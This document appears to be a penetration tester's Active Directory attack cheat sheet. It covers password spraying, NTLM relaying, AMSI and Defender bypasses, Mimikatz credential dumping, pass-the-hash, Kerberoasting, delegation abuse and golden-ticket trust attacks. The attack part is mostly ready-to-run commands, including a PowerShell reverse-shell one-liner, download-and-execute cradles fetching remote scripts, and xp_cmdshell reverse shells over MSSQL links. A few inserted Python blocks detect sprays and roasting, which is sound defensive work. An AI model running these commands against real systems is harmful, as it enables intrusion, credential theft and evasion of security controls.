# nmap -sn 10.10.10.0/24 -oN hosts.txt
or
Nessus host discovery
or
Fping
# fping 10.10.10.10
Network scan that sends one ping packet per IP
# fping -a -r 0 -g 10.10.10.0/24
4 ping packets per IP (-r for retry)
# fping -a -r 3 -g 10.10.10.0/24
Faster network scan by adding the "-i 1" switch (requires sudo; waits 1 ms between pings)
# sudo fping -a -i 1 -r 0 -g 10.10.10.0/24
Fast scan, but from a host-list
# sudo fping -a -i 1 -r 0 < iplist.txt
- Do OSINT against the target company. LinkedIn and Google are good places to start.
- Harvest email addresses and create different naming conventions.
- Tools: MailSniper.ps1 (https://github.com/dafthack/MailSniper), Metasploit
Internal or External domain enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-DomainHarvestOWA -ExchHostname mail.domain.com -OutFile possibledomains.txt -CompanyName "Company A"
Username enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-UsernameHarvestOWA -UserList .\userlist.txt -ExchHostname mail.domain.com -Domain domain.txt -OutFile possibleusernames.txt
With metasploit (timing attack):
msf5 > use auxiliary/scanner/http/owa_login
Password spraying (doable with metasploit's owa_login as well):
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
EWS:
PS C:\Tools> Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
- Assuming we got valid credentials
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Pa$$w0rd -OutFile .\GAL.txt
- Tools: RDPassSpray.py (https://github.com/xFreed0m/RDPassSpray)
# python3 RDPassSpray.py -u chunk -p nocaptainchunk! -d EASY-CORE -t 10.10.10.10:<port>
# python3 RDPassSpray.py -U users.txt -P passwords.txt -d EASY-CORE -t 10.10.10.10:<port>
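Both the OWA/EWS sprays and the RDP spray above leave the same trace in authentication logs: one source failing against many distinct accounts. The following is an added example (not part of these notes or of MailSniper/RDPassSpray) that flags that pattern; the log format and the sample lines are constructed for it.

```python
# Added example: detect password-spray behaviour in a failed-login log.
# Log format (constructed for this example): "<ISO time> <src-ip> <user> <result>"
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2020-07-03T09:00:01 203.0.113.7 alice FAIL
2020-07-03T09:00:03 203.0.113.7 bob FAIL
2020-07-03T09:00:05 203.0.113.7 carol FAIL
2020-07-03T09:00:07 203.0.113.7 dave FAIL
2020-07-03T09:00:09 203.0.113.7 erin FAIL
2020-07-03T09:00:11 203.0.113.7 frank OK
2020-07-03T09:05:00 198.51.100.2 alice FAIL
2020-07-03T09:05:20 198.51.100.2 alice FAIL
2020-07-03T09:05:40 198.51.100.2 alice OK
2020-07-03T11:00:00 192.0.2.9 bob FAIL
2020-07-03T11:30:00 192.0.2.9 carol FAIL
2020-07-03T12:00:00 192.0.2.9 dave FAIL
2020-07-03T12:30:00 192.0.2.9 erin FAIL
"""

def parse(log_text):
    events = []
    for line in log_text.splitlines():
        ts, src, user, result = line.split()
        events.append((datetime.fromisoformat(ts), src, user.lower(), result))
    return sorted(events)

def find_sprays(events, window_minutes=30, min_users=4):
    """Return {src_ip: sorted(users)} for sources that failed against at least
    min_users distinct accounts inside some window_minutes-long sliding interval.
    A source hammering one account (brute force) does not match; that is a
    different signature with a different threshold."""
    window = timedelta(minutes=window_minutes)
    by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "FAIL":
            by_src[src].append((ts, user))
    hits = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if len({u for _, u in fails[start:end + 1]}) >= min_users:
                hits[src] = sorted({u for _, u in fails})
                break
    return hits

def sprayed_then_succeeded(events, sprays):
    """Accounts that logged in successfully from a spraying source: reset these
    first, since the spray most likely guessed their password."""
    return sorted({user for _, src, user, result in events
                   if result == "OK" and src in sprays})

if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    fast = find_sprays(evs)                       # the quick OWA-style spray
    slow = find_sprays(evs, window_minutes=120)   # also catches the spread-out one
    for src, users in slow.items():
        print(f"spray from {src}: {len(users)} accounts ({', '.join(users)})")
    print("accounts to reset:", sprayed_then_succeeded(evs, fast))
```

A spray throttled to one attempt every 30 minutes (the 192.0.2.9 source) only shows up with the wider window, which is why the threshold and window should be tuned against the lockout policy rather than fixed.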
- Read /etc/resolv.conf from kali
- Run nmap on port 445 and 53
- https://github.com/lgandx/Responder
- add -wrt for wpad, but don't run this for very long
- If relaying, turn off HTTP and SMB in Responder.conf
- logs: /usr/share/responder/logs
# responder -I eth0
- https://github.com/fox-it/mitm6
- I usually run nmap to discover hosts with SMB signing disabled or not required
# nmap -p137,139,445 --script smb-security-mode
or using CrackMapExec:
# crackmapexec smb 10.10.10.0/24 --gen-relay-list ipstoberelayed.txt
# python mitm6.py -l domain.local -v
# ntlmrelayx.py -6 -tf ipstoberelayed.txt
https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
PS C:\tools> Out-CHM -PayloadURL http://10.10.10.10/nishang.ps1 -HHCPath "C:\tools"
or check my blog about client side attacks: https://msry1.wordpress.com/2020/07/03/having-fun-with-client-side-attacks/
Download: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
More flags: https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference
Password Spray:
# crackmapexec smb 10.10.10.10 -u userlists.txt -p Pa$$w0rd
Pass the hash:
# crackmapexec smb [IP] -u [user] -p [pass] (or -H [hash] instead of -p)
Useful CME Flags:
- Domain Password Policy: --pass-pol
- Use local authentication: --local-auth
- Find SMB Shares: --shares
- Find Loot: --spider [Share Name] --depth [how deep, ie. 10] --pattern [ssn|password|credit] --shares | egrep -v "([-]|[+]|[*]|--|ADMIN|print|IPC|Default share|Remark)"
- Extract SAM: --sam
- Get LSA Secrets: --lsa
- Who is currently logged in: --loggedon-users
- Load a module: -M, e.g. Mimikatz
- Extract NTDS: --ntds drsuapi
- Tools: PowerShdll (https://github.com/p3nt4/PowerShdll)
Checking current language mode:
PS C:\Tools> $ExecutionContext.SessionState.LanguageMode
Only works when CLM is set up locally.
PS C:\Tools> curl http://10.10.10.10/PowerShdll.dll -OutFile ps.dll
PS C:\Tools> rundll32.exe .\ps.dll, main -i
With Local Admin (GUI):
- Edit the system environment variables
- __PSLockDownPolicy set to 8
With Local Admin (CLI):
PS C:\Tools> Remove-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -name __PSLockdownPolicy
PS C:\Tools> setx _PSLockdownPolicy 0 /m
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
With ps.dll:
PS C:\Tools> curl http://10.10.10.10/amsibypass.ps1 -OutFile amsibypass.ps1
PS C:\Tools> $amsi = [IO.File]::ReadAllText(".\amsibypass.ps1")
PS C:\Tools> IEX $amsi
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
- Tools: PowerView.ps1, PowerView_dev.ps1 (PowerView 3), BloodHound, PingCastle, ADRecon.ps1
- https://github.com/sense-of-security/ADRecon
- This generates nice .csv files we can parse
PS C:\Tools> .\ADRecon.ps1
Enumerating Domain:
PS C:\Tools> Get-NetDomain -Domain domain.local
PS C:\Tools> Get-DomainSID
PS C:\Tools> (Get-DomainPolicy)."system access"
PS C:\Tools> Get-NetDomainController -Domain domain.local
Enumerating Trusts and Forest:
PS C:\Tools> Get-NetDomainTrust -Domain
PS C:\Tools> Get-NetForestCatalog
PS C:\Tools> Get-NetForest
PS C:\Tools> Get-NetForestDomain | Get-NetDomainTrust
Enumerating Users:
PS C:\Tools> Get-NetUser | select -ExpandProperty samaccountname | clip
PS C:\Tools> Get-UserProperty
PS C:\Tools> Find-UserField
Powerview_dev
PS C:\Tools> $Date = (Get-Date).AddYears(-1).ToFileTime()
PS C:\Tools> Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset | clip
Enumerating Group Membership of Users:
PS C:\Tools> Get-NetGroup -UserName admin | select cn | clip
Enumerating Groups:
- Use both PowerView and dev
PS C:\Tools> Get-NetGroup -Domain domain.local
PS C:\Tools> Get-NetGroup -GroupName "Domain Admins"
PS C:\Tools> Get-NetLocalGroup -ComputerName dt-dc -Recurse
PS C:\Tools> Get-NetLocalGroupMember -ComputerName DT-DC1.domain.local -GroupName "administrators"
Enumerating Group Members:
PS C:\Tools> Get-NetGroup -UserName admin
PS C:\Tools> Get-NetGroupMember -GroupName "Domain Admins"
PowerView dev:
PS C:\Tools> Get-NetGroupMember -Identity "Domain Admins" | select MemberName,MemberSID | clip
Enumerating Computers:
PS C:\Tools> Get-NetComputer
PS C:\Tools> Get-NetComputer -Ping
PS C:\Tools> Get-NetComputer -FullData
Enumerating Shares:
PS C:\Tools> Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
PowerView dev:
PS C:\Tools> Find-InterestingDomainShareFile
Enumerating OU:
PS C:\Tools> Get-NetOU
PS C:\Tools> Get-NetOU myOUname | %{Get-NetComputer -ADSPath $_}
PowerView dev:
PS C:\Tools> Get-NetOU | select distinguishedname (do this first)
PS C:\Tools> Get-DomainComputer -SearchBase "OU=Domain Controllers,DC=dt,DC=domain,DC=local" | select name
Enumerating GPO:
PS C:\Tools> Get-NetGPO
PS C:\Tools> Get-NetGPO -ComputerName dt-dc
PS C:\Tools> Get-NetGPO | select flags,cn
PS C:\Tools> Get-NetGPO -GPOname "{xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"
PS C:\Tools> (Get-NetOU testOU -FullData).gplink (Enumerate GPO applied on the testOU OU)
PowerView dev:
PS C:\Tools> Get-DomainGPO -ComputerIdentity DT-DC | select displayname,cn
Enumerating hidden GPO:
PS C:\Tools> (([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Enumerating ACL:
PS C:\Tools> Invoke-ACLScanner | select ObjectDN,ActiveDirectoryRights,IdentityReference
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "admin"}
Enumerating objects with Unconstrained Delegation:
PS C:\Tools> Get-DomainComputer -Unconstrained | select cn
Enumerating objects with Constrained Delegation:
PS C:\Tools> Get-DomainUser -TrustedToAuth | select cn,useraccountcontrol,serviceprincipalname
PS C:\Tools> Get-DomainComputer -TrustedToAuth
PingCastle (Version 2.8.1.0 2/23/2020 7:08:54 AM)
Get Active Directory Security at 80% in 20% of the time
End of support: 12/31/2021
Vincent LE TOUX ([email protected])
twitter: @mysmartlogon https://www.pingcastle.com
What do you want to do?
=======================
Using interactive mode.
Do not forget that there are other command line switches like --help that you can use
1-healthcheck-Score the risk of a domain
2-conso -Aggregate multiple reports into a single one
3-carto -Build a map of all interconnected domains
4-scanner -Perform specific security checks on workstations
5-advanced -Open the advanced menu
0-Exit
==============================
This is the main functionality of PingCastle. In a matter of minutes, it produces a report which will give you an overview of your Active Directory security. This report can be generated on other domains by using the existing trust links.
Use the latest BloodHound 3 and Neo4j 4.1
PS C:\Tools> . .\SharpHound.ps1
PS C:\Tools> Invoke-BloodHound -CollectionMethod All
Hunting for Local Admin access: Tools: PowerView.ps1, Find-WMILocalAdminAccess.ps1, Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Find-LocalAdminAccess
PS C:\Tools> . .\Find-WMILocalAdminAccess.ps1
PS C:\Tools> Find-WMILocalAdminAccess
PS C:\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> Find-PSRemotingLocalAdminAccess
PowerUp:
PS C:\Tools> . .\PowerUp.ps1
PS C:\Tools> Invoke-AllChecks
If we compromised a service account, check if this account has SeImpersonatePrivilege. If so, we can use JuicyPotato or RoguePotato to escalate to SYSTEM.
Juicy Potato:
PS C:\Tools> .\JuicyPotato.exe -l 7337 -t * -p C:\reports\53.exe -c '{8BC3F05E-D86B-11D0-A075-00C04FB68820}'
RoguePotato
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[dt-dc]: PS C:\Users\admin\Documents> $Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://192.168.50.147/nishang8080.ps1''))'
[dt-dc]: PS C:\Users\admin\Documents> Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\Users\admin\Desktop\reverse.bat
[dt-dc]: PS C:\Users\admin\Documents> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:92937945B518814341DE3F726500D4FF /run:C:\users\appadmin\desktop\reverse.bat"'
- This includes ways to defeat kerberos double-hop issue
Passing credentials (PSCREDENTIALS):
$password = ConvertTo-SecureString "Pa$$w0rd" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("domain\user", $password)
vs kerberos double hop in a nested request:
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
hostname
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
PSRemoting:
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dt-dc
Creating a session with credentials:
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credential domain\user
or
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credential (Get-Credential)
Nested PSRemoting (inside a PSRemoting session):
- Create a pscredential first, or do the Get-Credential technique
- Only works if our user has access to the other remote machine
[dc-computer] PS C:\Tools> $session = New-PSSession -ComputerName dt-computer1 -Credential domain\user
[dc-computer] PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $session
- If we compromise a machine, we can enumerate its user's access to other machines via PowerView or Find-LocalAdminAccess.
- Usually, we don't have the plaintext password of the compromised user, so we cannot do the nested PSRemoting with PSCredentials.
- To get around this, we need to get a reverse shell from the victim machine.
- Check "Reverse Shell from a PSSession" or "One Liner"
- Once we get
PS C:\Tools> $sess = New-PSSession dt-computer1
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $sess
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
# evil-winrm.rb -i 10.10.10.10 -u user -H FB18AD18D520EA42025E3F676D325F23
# mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"
# Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
# psexec.py [email protected] -hashes :FB18AD18D520EA42025E3F676D325F23
# socat tcp-l:1515,fork tcp:10.10.10.10:3389
- This should show allowed directories where we can execute our own binaries
PS C:\Tools> (Get-AppLockerPolicy -Local).RuleCollections
PS C:\Tools> Get-AppLockerPolicy -Local -Effective -Xml | Set-Content ('C:\users\public\applockerpolicy.xml')
If AppLocker is configured with the default rules, this directory is whitelisted by default:
C:\Windows\System32\spool\drivers\color
- Just like .bash_history on Linux
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- Kerberos is all about IMPERSONATION
A word about kerberos (credits to a youtube user "twaca")
One way to think of using Kerberos is to think of going to an amusement park. When you arrive at the park, you go to the main gate. You then proceed to the main ticket booth (the authentication server in the key distribution center) and purchase an all-day pass to the park (a ticket-granting ticket). You receive a purple wristband (because purple is the color for Wednesday) that indicates that you have paid your fee for that day and you have full access to the park. The colored wristband is good for all day. While in the park, you must purchase additional tickets for the rides. You walk up to a ticket booth (ticket-granting server) and the attendant notices that you have a purple wristband. You tell her you are wanting to ride the roller coaster. She issues you a ticket (session ticket) for the roller coaster. When you get to the roller coaster, the roller coaster attendant sees your purple wristband and accepts the ticket issued to you by the ticket seller. The roller coaster attendant does not need to check with the ticket seller because that is the only place you could have obtained that ticket. At the end of the day, when the park closes, the purple wristband for Wednesday no longer authenticates you. The wristband color for Thursday is orange. You also noticed that you did all the work. None of the ticket sellers or ride operators communicated with each other. It was up to you to procure tickets and walk around and distribute them. This is exactly the model as designed by MIT for Kerberos.
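The flow in that analogy, as an added toy model that is not from these notes or from any Kerberos implementation: HMAC sealing stands in for real encryption (real tickets are also confidential), the names KDC, krbtgt_key and service_key are this example's own, and time is a plain integer. It shows why the ride attendant never phones the ticket booth: every party checks a ticket with only its own key, so the secrecy of the krbtgt and service account keys is what the whole scheme rests on.

```python
# Added toy model of the AS -> TGS -> service flow. Not real Kerberos: HMAC tags
# replace encryption, and key/class names are this example's own.
import hmac, hashlib, json, secrets

def seal(key, obj):
    """Stand-in for 'encrypt under key': only a holder of key can mint or verify the tag."""
    body = json.dumps(obj, sort_keys=True).encode()
    return body, hmac.new(key, body, hashlib.sha256).digest()

def open_sealed(key, ticket):
    body, tag = ticket
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("ticket not sealed under this key")
    return json.loads(body)

class KDC:
    """Authentication Server (main ticket booth) plus Ticket Granting Server (ride booth)."""
    def __init__(self, user_keys, service_keys, krbtgt_key):
        self.user_keys, self.service_keys, self.krbtgt_key = user_keys, service_keys, krbtgt_key

    def as_exchange(self, user, now, lifetime=8):
        sk = secrets.token_hex(8)                 # TGT session key
        tgt = seal(self.krbtgt_key, {"user": user, "sk": sk, "exp": now + lifetime})
        return tgt, seal(self.user_keys[user], {"sk": sk})   # only the real user can open this

    def tgs_exchange(self, tgt, authenticator, service, now):
        t = open_sealed(self.krbtgt_key, tgt)     # trusts the wristband, not the visitor
        if now > t["exp"]:
            raise ValueError("TGT expired")
        a = open_sealed(t["sk"].encode(), authenticator)
        if a["user"] != t["user"]:
            raise ValueError("authenticator does not match TGT")
        ssk = secrets.token_hex(8)
        return seal(self.service_keys[service], {"user": t["user"], "sk": ssk, "exp": t["exp"]})

def service_accepts(service_key, ticket, now):
    """The ride attendant: verifies with its own key only and never contacts the KDC.
    Anyone holding service_key could therefore mint an acceptable ticket, which is why
    machine and service account keys need the same protection as krbtgt."""
    t = open_sealed(service_key, ticket)
    return t["user"] if now <= t["exp"] else None

def demo(now=100):
    keys_u = {"alice": hashlib.sha256(b"Pa$$w0rd").digest()}   # derived from the password
    keys_s = {"cifs/fileserver": secrets.token_bytes(32)}
    kdc = KDC(keys_u, keys_s, secrets.token_bytes(32))
    tgt, enc_sk = kdc.as_exchange("alice", now)
    sk = open_sealed(keys_u["alice"], enc_sk)["sk"]            # needs alice's key
    auth = seal(sk.encode(), {"user": "alice", "t": now})
    svc_ticket = kdc.tgs_exchange(tgt, auth, "cifs/fileserver", now)
    ok = service_accepts(keys_s["cifs/fileserver"], svc_ticket, now)
    stale = service_accepts(keys_s["cifs/fileserver"], svc_ticket, now + 24)  # next day
    try:
        service_accepts(secrets.token_bytes(32), svc_ticket, now)   # wrong service key
        wrong_key_rejected = False
    except ValueError:
        wrong_key_rejected = True
    return ok, stale, wrong_key_rejected

if __name__ == "__main__":
    print(demo())   # ('alice', None, True)
```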
- If we have access to a computer with Unconstrained Delegation, we can potentially gain access to any user that authenticates to it, because it stores their TGT in memory, which can be used for impersonation.
https://www.riccardoancarani.it/exploiting-unconstrained-delegation/
https://blog.stealthbits.com/unconstrained-delegation-permissions/
Tools: Rubeus, Mimikatz
Dump the tickets (check if there's any user we can impersonate): Rubeus:
PS C:\Tools> Rubeus.exe dump
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
Injecting the ticket: Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64ticket...
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
PS C:\Tools> .\mimikatz "privilege::debug" "kerberos::ptt C:\path\to\ticket.kirbi"
- If we have access to any object with Constrained Delegation (the attribute "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION"), that object can access a specific service. We can request a TGT for any user as long as they are not marked "Sensitive". We can inject the TGT and request more services for abuse.
Tools: Kekeo, Mimikatz, Rubeus
kekeo # tgt::ask /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /ticket:admin.kirbi
kekeo # tgs::s4u /tgt:TGT
Injecting TGT using mimikatz:
mimikatz # kerberos::ptt TGT.kirbi
Using Rubeus:
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domain.local /altservice:cifs /ptt
PS C:\Tools> ls \\dt-dc.domain.local\c$
or request LDAP for DCSync:
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domain.local /altservice:ldap /ptt
mimikatz # lsadump::dcsync /user:domain\Administrator
DCSync:
mimikatz # lsadump::dcsync /user:domain\Administrator
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 13100 hashes.txt rockyou.txt
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 18200 hashes.txt rockyou.txt
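On the detection side, both roasts are visible on the domain controllers: Kerberoasting as event 4769 service-ticket requests with RC4 (0x17) encryption for user service accounts, AS-REP roasting as event 4768 with pre-authentication type 0. The following is an added example (not part of these notes or of Rubeus) that triages constructed sample events shaped like those two records.

```python
# Added example: flag Kerberoast / AS-REP roast patterns in 4769 and 4768 events.
# Field names follow the Windows Security log; the records below are constructed.
from collections import defaultdict

RC4_HMAC = "0x17"   # etype Rubeus requests so that hashcat modes 13100 / 18200 apply

SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "httpsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "backupsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.50"},
    # normal traffic: AES ticket for a machine account, TGT renewal via krbtgt
    {"EventID": 4769, "TargetUserName": "alice@DOMAIN.LOCAL", "ServiceName": "DT-DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.10.51"},
    {"EventID": 4769, "TargetUserName": "alice@DOMAIN.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.10.51"},
    # AS request answered without pre-authentication (DONT_REQ_PREAUTH account)
    {"EventID": 4768, "TargetUserName": "legacysvc", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0",
     "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0",
     "IpAddress": "10.10.10.51"},
]

def roastable_tgs_requests(events):
    """4769s that yield crackable material: a successful RC4 ticket for a user
    service account. krbtgt and machine (name$) accounts are excluded because their
    keys are long and random, so an RC4 ticket for them is not a useful crack target."""
    out = []
    for e in events:
        svc = e.get("ServiceName", "")
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and e["Status"] == "0x0" and not svc.endswith("$")
                and svc.lower() != "krbtgt"):
            out.append(e)
    return out

def kerberoast_suspects(events, min_services=3):
    """Requesters that pulled RC4 tickets for at least min_services distinct service
    accounts: one client asking for every SPN at once is the roast signature. Domains
    that still allow RC4 see some legitimate RC4 requests, hence the threshold."""
    per_requester = defaultdict(set)
    for e in roastable_tgs_requests(events):
        per_requester[e["TargetUserName"]].add(e["ServiceName"])
    return {who: sorted(svcs) for who, svcs in per_requester.items()
            if len(svcs) >= min_services}

def asrep_roastable_accounts(events):
    """4768 with PreAuthType 0: the KDC returned an AS-REP to an unauthenticated
    request, which only happens for accounts flagged 'Do not require Kerberos
    preauthentication'. Clearing that flag removes the exposure."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"})

if __name__ == "__main__":
    print("kerberoast suspects:", kerberoast_suspects(SAMPLE_EVENTS))
    print("accounts to clear DONT_REQ_PREAUTH on:", asrep_roastable_accounts(SAMPLE_EVENTS))
```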
- Could be used to move laterally
- Could be used to exploit misconfigured MSSQL servers
- Tools: PowerUpSQL (https://github.com/NetSPI/PowerUpSQL)
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
- https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3
Enumerate the live instances:
PS C:\Tools> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
Enumerate the links:
PS C:\Tools> Get-SQLServerLink -Instance mssql.instance.local
Crawl the links:
PS C:\Tools> Get-SQLServerLinkCrawl -Instance mssql.instance.local
- If we have sysadmin access to the end of the link, we can get a reverse shell using the following:
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell iex(new-object net.webclient).downloadstring(''http://192.168.50.147/nishang8080.ps1'')"'
or
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'
Tools: Mimikatz, ProcDump
- I usually prefer using one-liners that dump all the important hashes I need
PS C:\Tools> Invoke-Mimikatz -Command '"privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
PS C:\Tools> Invoke-Mimikatz -dumpcreds
PS C:\Tools> Invoke-Mimikatz -command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe" exit
- This assumes that we compromised a domain that has a trust and we want to compromise the trusted domain
- Requires the domain trust hash or the krbtgt account hash
Method 1: Using the trust ticket
Extract the trust ticket and grab the hash of the trust domain.local → domain you want to compromise:
mimikatz# lsadump::trust /patch
Using mimikatz golden to impersonate the trust:
sid: current domain's SID
sids: target domain's SID + 519
rc4: trust key from lsadump::trust /patch (domain.local → target.domain.local)
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-519 /rc4:FB18AD18D520EA42025E3F676D325F23 /service:krbtgt /target:target.domain.local /ticket:C:\Tools\kekeo_old\target.kirbi"'
Next, ask for a TGS using the ticket generated above.
PS C:\Tools\kekeo_old> .\asktgs.exe .\target.kirbi CIFS/dc-dt.target.domain.local
Injecting the ticket:
PS C:\Tools> .\kirbikator.exe lsa .\CIFS/dt-dc.target.domain.local.kirbi
Check access:
PS C:\Tools> dir \\dt-dc.target.domain.local\c$
Method 2: Using krbtgt hash
